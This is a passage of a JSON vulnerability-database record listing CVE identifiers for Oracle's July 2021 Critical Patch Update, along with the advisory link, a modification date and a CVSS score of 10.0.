"CVE-2021-2364", "CVE-2021-2365", "CVE-2021-2366", "CVE-2021-2367", "CVE-2021-2368", "CVE-2021-2369", "CVE-2021-2370", "CVE-2021-2371", "CVE-2021-2372", "CVE-2021-2373", "CVE-2021-2374", "CVE-2021-2375", "CVE-2021-2376", "CVE-2021-2377", "CVE-2021-2378", "CVE-2021-2380", "CVE-2021-2381", "CVE-2021-2382", "CVE-2021-2383", "CVE-2021-23839", "CVE-2021-2384", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2385", "CVE-2021-2386", "CVE-2021-2387", "CVE-2021-2388", "CVE-2021-2389", "CVE-2021-2390", "CVE-2021-2391", "CVE-2021-2392", "CVE-2021-2393", "CVE-2021-2394", "CVE-2021-2395", "CVE-2021-2396", "CVE-2021-2397", "CVE-2021-2398", "CVE-2021-2399", "CVE-2021-2400", "CVE-2021-2401", "CVE-2021-2402", "CVE-2021-2403", "CVE-2021-2404", "CVE-2021-2405", "CVE-2021-2406", "CVE-2021-2407", "CVE-2021-2408", "CVE-2021-2409", "CVE-2021-2410", "CVE-2021-2411", "CVE-2021-2412", "CVE-2021-24122", "CVE-2021-2415", "CVE-2021-2417", "CVE-2021-2418", "CVE-2021-2419", "CVE-2021-2420", "CVE-2021-2421", "CVE-2021-2422", "CVE-2021-2423", "CVE-2021-2424", "CVE-2021-2425", "CVE-2021-2426", "CVE-2021-2427", "CVE-2021-2428", "CVE-2021-2429", "CVE-2021-2430", "CVE-2021-2431", "CVE-2021-2432", "CVE-2021-2433", "CVE-2021-2434", "CVE-2021-2435", "CVE-2021-2436", "CVE-2021-2437", "CVE-2021-2438", "CVE-2021-2439", "CVE-2021-2440", "CVE-2021-2441", "CVE-2021-2442", "CVE-2021-2443", "CVE-2021-2444", "CVE-2021-2445", "CVE-2021-2446", "CVE-2021-2447", "CVE-2021-2448", "CVE-2021-2449", "CVE-2021-2450", "CVE-2021-2451", "CVE-2021-2452", "CVE-2021-2453", "CVE-2021-2454", "CVE-2021-2455", "CVE-2021-2456", "CVE-2021-2457", "CVE-2021-2458", "CVE-2021-2460", "CVE-2021-2462", "CVE-2021-2463", "CVE-2021-25122", "CVE-2021-25329", "CVE-2021-26117", "CVE-2021-26271", "CVE-2021-26272", "CVE-2021-27568", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28041", "CVE-2021-29921", "CVE-2021-30369", "CVE-2021-30640", "CVE-2021-3156", "CVE-2021-3177", "CVE-2021-31811", "CVE-2021-33037", "CVE-2021-3345", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-3520", "CVE-2021-3560"], "modified": "2021-09-03T00:00:00", "id": "ORACLE:CPUJUL2021", "href": "https://www.oracle.com/security-alerts/cpujul2021.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}